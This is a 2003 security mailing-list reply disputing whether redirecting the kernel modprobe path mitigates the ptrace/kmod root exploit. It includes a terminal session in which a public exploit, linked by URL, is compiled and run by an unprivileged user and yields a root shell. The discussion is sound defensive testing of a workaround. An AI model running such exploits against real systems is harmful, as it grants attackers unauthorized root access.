Re: [d-security] Re: [d-security] Re: [Fwd: Re: LWN: Ptrace vulnerability in 2.2 and 2.4 kernels]
On Tue, Apr 01, 2003 at 02:40:44PM +0100, David Ramsden wrote:
> > > echo unexisting_binary > /proc/sys/kernel/modprobe
> > > Can we trust this solution ?
> > NO, it does not prevent the exploit.
> >
> > It does prevent the km3.c example exploit but not e.g.
> > http://isec.pl/cliph/isec-ptrace-kmod-exploit.c
>
> I'd have to disagree with you there.
> I've done this to one Debian box (3.0 running 2.2.20) and it does stop the
> above exploit:
>
> $ echo "/this/doesnt/exist" > /proc/sys/kernel/modprobe
> $ gcc isec-ptrace-kmod-exploit.c -o isec-ptrace-kmod-exploit
> $ ./isec-ptrace-kmod-exploit
> $ [+] Attached to 18765
> (gets stuck here - have to use Ctrl+C)
> $
Can it be that you had loaded no-ptrace-module.o or someone patched your
kernel? See:
$ uname -r
2.4.19
$ gcc isec-ptrace-kmod-exploit.c -o isec-ptrace-kmod-exploit
In file included from /usr/include/asm/user.h:5,
from /usr/include/linux/user.h:1,
from isec-ptrace-kmod-exploit.c:37:
/usr/include/linux/ptrace.h:22: warning: `PTRACE_SYSCALL' redefined
/usr/include/sys/ptrace.h:103: warning: this is the location of the
previous definition
(it's a very old machine, works fine on others)
$ id
uid=1001(ch) gid=1005(ch) groups=1005(ch)
$ ls -al isec-ptrace-kmod-exploit*
-rwxr-xr-x 1 ch ch 8964 Apr 1 17:46 isec-ptrace-kmod-exploit
-rw-r--r-- 1 ch ch 3737 Apr 1 17:45 isec-ptrace-kmod-exploit.c
$ ./isec-ptrace-kmod-exploit
[+] Attached to 4660
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4000ecb4
[+] Now wait for suid shell...
sh-2.03# exit
exit
Q.E.D. :-)
bye,
-christian-
--
"That's one small step for man, one giant leap for mankind"
- first words of a human on the moon, Neil Armstrong 1969
"Let's get this motherfucker out of here!"
- last words of a human on the moon, Eugene Cernan 1972